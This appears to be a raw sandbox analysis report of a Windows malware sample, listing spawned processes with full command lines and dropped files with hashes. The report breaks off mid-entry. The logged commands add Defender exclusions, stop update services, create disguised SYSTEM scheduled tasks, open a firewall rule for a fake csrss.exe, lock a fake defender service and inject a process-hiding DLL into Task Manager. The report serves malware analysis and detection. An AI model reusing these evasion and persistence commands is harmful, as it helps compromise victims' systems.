C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 8920 -ip 8920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8920 -s 572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9568 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10256 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=9980 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:1

Network


Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe

MD5 4e3f52f537fb3b61b27a53a2d12b4390
SHA1 1f0b873c81551fbfb99c0cc2a6c1f8589ec2ebd1
SHA256 e23562e2812c112ceab2d3f2e5c01b65b0a65a7c8e2e7f5b38a5456dea84244d
SHA512 5ec05dbe676cde9d2c4fe27d9aa76c9fca065ad328872d216b037273cc69f0e036cd4578856c46ffadb580ae4a55845eaffcd59b9116984091be282909888a6b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe

MD5 0166fac6c7afef4210abcfd75a1e2bb6
SHA1 ddca5e7bb1e3921a06a9aceede2cfbea14c8353d
SHA256 90640736b9f91a90e0cb5fdc6e10ea9d0a3651de0017db8ede73e5bed05f7484
SHA512 5e6b6382ee730875ba7497554a74436852d5e90789b6ca0a9d160f87c2819b5e9ce6fd4a06cbcf64e7e4627fe94212a8ca571ccc20f6c2ef88fb5a3be46bd67d

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe

MD5 b064122cc1b9ffa89a87e44d074331df
SHA1 5853ec84100b4b1ffe7ca69a233660f2db88f57d
SHA256 c140730c6283ddbc40e999d7e084d340f3fa497ff28fa5bc588087701d5edd58
SHA512 e815c5ed7d2df4c40906d232366ee2bcc5ddd312177c15f7213a8cf1c925a181b273ab3579ebe919b56e28afc22bb3a2b75f625fbbc75f38459d5c6f4dd679fb

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe

MD5 754cdd0f6a174c759df63315fe2011a0
SHA1 f997e46f11ecea34ad067b9cbcdee13659c9289f
SHA256 af8c3a04e41e89acce8389a3f2afc1200c0b78aa2a52a2bf4673825fedff7957
SHA512 c784bbbf7f9140d609dd984646633be5a97b649220998d6f373ee7f91e7a6cdc68f2d8ed329c906fbc258bc03466440688a0a8fa90ee43835b9402bc3459bc07

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe

MD5 64503366be5efcb1dfcbaf5097bc02bb
SHA1 dc2fcc490ca0545b6145cf07d288717acd419384
SHA256 c169a4fe9e006ba3999b681391b3792422dad1796cb580ec666e748425c94274
SHA512 d85ee28f005f69b4f28299affbbb896a88cd218a24238fc44d9715033f2abe0e29a1053c30f99010249907e299d649dba9df027bdf209a56f286ed9797745a90

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe

MD5 bad3666c99f9e06c5421020d02a0f7ce
SHA1 0a438b08363395c37581bff07ae4a8ccf864ccd7
SHA256 115ccec09945e25cc83c161e6cc86ac0d9a6de4e489708ab89dc58c1f680c8d9
SHA512 32ba9a1dd38920e911b0ccba7138a715be51dc1701fb88bf71eeb16a88449a11fb1701cc0274e6db078cd3da44fbdd844b5dbd5e10ad545e6a096638a689a416

memory/4372-42-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe

MD5 3779f7a66f08d1e92d34653ccf7d82bb
SHA1 6bfc2d775fcda42886d7f13acac68b049035737e
SHA256 c58aa44a1fc0959215182e088b7167d38cd6cb30b9b40935aaae43813dfbb655
SHA512 b2a6ea4eeaae2bf8951f6df73d5f36b61261b99306165e18441d30cb9ab854b81aa09708d3f6e190af36bbafc6447844ebdc61272ec34843e3db370a0d37d4d1

memory/4372-46-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/5112-47-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5112-48-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5112-49-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5112-51-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe

MD5 f30c459b139ba6b1cd342a7a85a744ba
SHA1 ce0c45ff574fda052e2b6d36f0fa247034e799f0
SHA256 452f4002b3630b0d4c77331778a2a6b7e321f563081f263d68f0a04afce6d08f
SHA512 3616082945d72eb3f27e0a5688631f50ffa34aabf79c1c65501605c81d3ce259ff7d3fefbd2e6e75b45db385d7413e5e11bfa4780de6ccdd5150bc2a01d6a3aa

memory/4820-54-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3340-56-0x0000000002780000-0x0000000002796000-memory.dmp

memory/4820-58-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe

MD5 92aff7c9806b92bf7f421f22e0136aa6
SHA1 87d797bf1ff996720b38384efcc7128dfb5dee91
SHA256 307aa4509134bb602b44254ead259423202627b3ef6b2ba272a3e4cbb69bcf45
SHA512 00e1f81fad452021aab8e9528a5cfa3ec881add6acea0dd90419824c06d1f40369d2225f1f0f6a1071c57188f67d17c706545101635baf5220a80394a728dd01

memory/5084-63-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe

MD5 fba22f0b54e716780eb972a68473958c
SHA1 f28f23b12fe16e63afb6a76ed3eff4b9ad0ee75a
SHA256 9c4a28054d25fcfe8728c89001d07f3ac13cb8487fede1df8c8ece9576b0435c
SHA512 b9f2db763bb431c285cdf40cd19d9790940bed1321923c2aaf851945636a6e4ef86d74308ddb46bd4d73e6bd79282f331227cda2b33056b81717cdf69b1ebfcf

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 fba22f0b54e716780eb972a68473958c
SHA1 f28f23b12fe16e63afb6a76ed3eff4b9ad0ee75a
SHA256 9c4a28054d25fcfe8728c89001d07f3ac13cb8487fede1df8c8ece9576b0435c
SHA512 b9f2db763bb431c285cdf40cd19d9790940bed1321923c2aaf851945636a6e4ef86d74308ddb46bd4d73e6bd79282f331227cda2b33056b81717cdf69b1ebfcf

memory/5084-69-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/5084-70-0x0000000007C20000-0x00000000081C4000-memory.dmp

memory/5084-71-0x0000000007770000-0x0000000007802000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 fba22f0b54e716780eb972a68473958c
SHA1 f28f23b12fe16e63afb6a76ed3eff4b9ad0ee75a
SHA256 9c4a28054d25fcfe8728c89001d07f3ac13cb8487fede1df8c8ece9576b0435c
SHA512 b9f2db763bb431c285cdf40cd19d9790940bed1321923c2aaf851945636a6e4ef86d74308ddb46bd4d73e6bd79282f331227cda2b33056b81717cdf69b1ebfcf

memory/4372-80-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/5084-81-0x00000000078D0000-0x00000000078E0000-memory.dmp

memory/5084-77-0x0000000007830000-0x000000000783A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe

MD5 7eccd0a9c2d76c63871ce2758e778722
SHA1 f9b4dec7af5054031f00c545b48bba789b11e9ee
SHA256 b8ed5c1e239fd3e2c2ea8f71f01c91f4ebd960435eb85ea7afb2da12261933c5
SHA512 c4f3db0e3e4558ca136891acc2e5e4ce68c713c2d78fe86bfc53f0f890efe456ebf7c4c549f3003a691b614aa1f302d98132e396a7d81ecdc047bfcc4c1802f3

memory/5084-85-0x00000000087F0000-0x0000000008E08000-memory.dmp

memory/5084-86-0x00000000081D0000-0x00000000082DA000-memory.dmp

memory/5084-87-0x0000000007A00000-0x0000000007A12000-memory.dmp

memory/5084-88-0x0000000007AA0000-0x0000000007ADC000-memory.dmp

memory/5084-89-0x0000000007A30000-0x0000000007A7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7wp9jb68.exe

MD5 5db6a885b70fc3b061c93266dbc2df7e
SHA1 8ef24a2f74695c0ed08eea037d6ffa11c90968b3
SHA256 e7c69fcb59544a669d685f05da0919ce1e2a7342d33666b6a44735fcbcf9f78f
SHA512 65f51121f5b92f8b856caabc0534990bd27bcc0a9c4738eb6c8bdbe8bab479205f5dc95540e3d37984333dc55325fb40b2f5510252500f5bed5105a2cd7b50a6

C:\Users\Admin\AppData\Local\Temp\CAB2.tmp\CAB3.tmp\CAB4.bat

MD5 0769624c4307afb42ff4d8602d7815ec
SHA1 786853c829f4967a61858c2cdf4891b669ac4df9
SHA256 7da27df04c56cf1aa11d427d9a3dff48b0d0df8c11f7090eb849abee6bfe421f
SHA512 df8e4c6e50c74f5daf89b3585a98980ac1dbacf4cce641571f8999e4263078e5d14863dae9cf64be4c987671a21ebdce3bf8e210715f68c5e383cc4d55f53106

memory/4372-96-0x0000000074600000-0x0000000074DB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6f9bc20747520b37b3f22c169195824e
SHA1 de0472972d51b2d9419ff0d714706bef0c6f81d8
SHA256 a176ef484b676f39eaefe30f33df548ef0e4e3b34c4651ac3fb4351404d288b0
SHA512 179e5be96746cfbcc9483de68527d96464f3ce6cb09dc4b5e546a93c5e1dad36ab842a4cdfa336169af4ca459bdc42a2cac72e577699a455ffb7efd9c1c80f11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6dded92ec95cf9f22410bdeac841a00d
SHA1 83c32c23d53c59d654868f0b2a5c6be0a46249c2
SHA256 1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e
SHA512 e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

\??\pipe\LOCAL\crashpad_4868_TAONDGJETDVIUTAA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_2240_BCPFEXYQQGHMZFCZ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_2320_RODLOPKINTVGMKYZ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6dded92ec95cf9f22410bdeac841a00d
SHA1 83c32c23d53c59d654868f0b2a5c6be0a46249c2
SHA256 1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e
SHA512 e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 456445986ae66b35370ff992141316c4
SHA1 ec4dc78f70327db48cefb2ded8d0bcd2bc4e4190
SHA256 a1c87f49d0abc22b29e8c43f44f1795ba01471f952fea08d39544dc674606bad
SHA512 cbd24f69725feae570556e0d8b1b5d21c6ac9b579f5d684c2fa61c879859c340904cb8bfb63a7c67c4bd347fadb24d999cbd906f013be6b9e316adc430d4afea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a20582e44ffdb4f363a065d6024874f8
SHA1 5e3a676e3217a8545d41c699051f787fbae45529
SHA256 b2307ff4211cfaa1555a079cf802df97867cf15ddc6bd1a93765355fe4838b46
SHA512 fd6624af4fd85367c72bc415b66eec5c671e3960f7ffb596f1e0d6a7558601246f7478423b8d02c9e87a7cc493c999b9f58f924558639e62bf41cdaebe431a4b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b549f67365ce6b437324216ff5cfa8be
SHA1 db4aea19b4f0d75e3885ef03c2bf978bc2a20cd3
SHA256 7b34d6a0b47011a7cfe690d7df3867371e408de9caca2508182a536fe8e06210
SHA512 f4550ac489c7c2a8be697285dad13b830a6a4a3f4fe810c5d3f772be8f9c8708b817f500fe18755a306f2ffa6dae66c2666337f75264ed353e9d663ef43a4f59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6dded92ec95cf9f22410bdeac841a00d
SHA1 83c32c23d53c59d654868f0b2a5c6be0a46249c2
SHA256 1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e
SHA512 e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b549f67365ce6b437324216ff5cfa8be
SHA1 db4aea19b4f0d75e3885ef03c2bf978bc2a20cd3
SHA256 7b34d6a0b47011a7cfe690d7df3867371e408de9caca2508182a536fe8e06210
SHA512 f4550ac489c7c2a8be697285dad13b830a6a4a3f4fe810c5d3f772be8f9c8708b817f500fe18755a306f2ffa6dae66c2666337f75264ed353e9d663ef43a4f59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 161b856db9564e3cf1ca21b2a4716b67
SHA1 25fdb045b95db5f338ef646c205305acaeae33de
SHA256 12e3e90eac9ada35f57dac44481e6b5177880d8ca1d66924e23f29f43e5e133c
SHA512 5303fd288621777914ef3be8e58730cfa206ed8a280bbb2a865083c7e33c6cb00d77a2ab0c672f176b11a396237a87bbfa077fc7a7a17dbdc7c7e0f338dccfd1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 456445986ae66b35370ff992141316c4
SHA1 ec4dc78f70327db48cefb2ded8d0bcd2bc4e4190
SHA256 a1c87f49d0abc22b29e8c43f44f1795ba01471f952fea08d39544dc674606bad
SHA512 cbd24f69725feae570556e0d8b1b5d21c6ac9b579f5d684c2fa61c879859c340904cb8bfb63a7c67c4bd347fadb24d999cbd906f013be6b9e316adc430d4afea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b549f67365ce6b437324216ff5cfa8be
SHA1 db4aea19b4f0d75e3885ef03c2bf978bc2a20cd3
SHA256 7b34d6a0b47011a7cfe690d7df3867371e408de9caca2508182a536fe8e06210
SHA512 f4550ac489c7c2a8be697285dad13b830a6a4a3f4fe810c5d3f772be8f9c8708b817f500fe18755a306f2ffa6dae66c2666337f75264ed353e9d663ef43a4f59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 30fb6f63755be8b3a7902749e8f7596e
SHA1 55e1270e7a7249f1afa65a2ebe708eedcd57ab5e
SHA256 e7fd50e49c89976cb5d10105b59833bb3f57cc7054e0da506e390e41f0bb87da
SHA512 eca004b49e4891d3b2b88e135322651e6f8e30814659672adea08dbf6a7974d3686eb306148c364f082493d57a5f4baeee1dfde3a8f5bb6668a15d2ffb5ead77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6dded92ec95cf9f22410bdeac841a00d
SHA1 83c32c23d53c59d654868f0b2a5c6be0a46249c2
SHA256 1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e
SHA512 e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 161b856db9564e3cf1ca21b2a4716b67
SHA1 25fdb045b95db5f338ef646c205305acaeae33de
SHA256 12e3e90eac9ada35f57dac44481e6b5177880d8ca1d66924e23f29f43e5e133c
SHA512 5303fd288621777914ef3be8e58730cfa206ed8a280bbb2a865083c7e33c6cb00d77a2ab0c672f176b11a396237a87bbfa077fc7a7a17dbdc7c7e0f338dccfd1

memory/5084-296-0x0000000074600000-0x0000000074DB0000-memory.dmp

memory/5084-303-0x00000000078D0000-0x00000000078E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028

MD5 a5c3c60ee66c5eee4d68fdcd1e70a0f8
SHA1 679c2d0f388fcf61ecc2a0d735ef304b21e428d2
SHA256 a77e911505d857000f49f47d29f28399475324bbf89c5c77066e9f9aca4dd234
SHA512 5a4f5a1e0de5e650ca4b56bfd8e6830b98272a74d75610ed6e2f828f47cdf8447fbc5d8404bcf706ca95e5833e7c255f251137855723b531d12cbc450062750a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d8631b0ceb4d55931a52161b7c8a5f66
SHA1 4f3691bbcaa0ce80e90cfeb53981787b417e313a
SHA256 61a8176965e83448a771a9b45bd3b9f402c22a6797e71400d49e12b2e59a9e5d
SHA512 2588028ef9318b2d44053b530a00059424b37dfe9df3782af81a1a8b88fcd688b5c8734ec368772601c90b16954d580614a0d971fbacd098cb5f409f762edf8f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 aa5d351af5643ed36bee4ba7083b82c4
SHA1 c42a8da94d868ace9072c3ee22d27c86891ac79d
SHA256 ca35a5550c08df015e822e022c35c67be4901f347b3466ef18aa783fe400d0ec
SHA512 61dde37a651b3c6bde025dc79f3236698fcb45bf35616f9aa5a94a967761bdc2f460247bf5287c649d79825ff519a7480f3702131c49786cf3c130530b341ee2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\54d0dbe1-2f93-484f-88e6-31698f28d820.tmp

MD5 e05436aebb117e9919978ca32bbcefd9
SHA1 97b2af055317952ce42308ea69b82301320eb962
SHA256 cc9bd0953e70356e31a957ad9a9b1926f5e2a9f6a297cdef303ac693a2a86b7f
SHA512 11328e9514ffaa3c1eab84fae06595d75c8503bd5601adfd806182d46065752885a871b738439b356d1bb2c1ac71fc81e9d46bd2d0daa1b2ba0f40543bf952b9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

MD5 923a543cc619ea568f91b723d9fb1ef0
SHA1 6f4ade25559645c741d7327c6e16521e43d7e1f9
SHA256 bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd
SHA512 a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
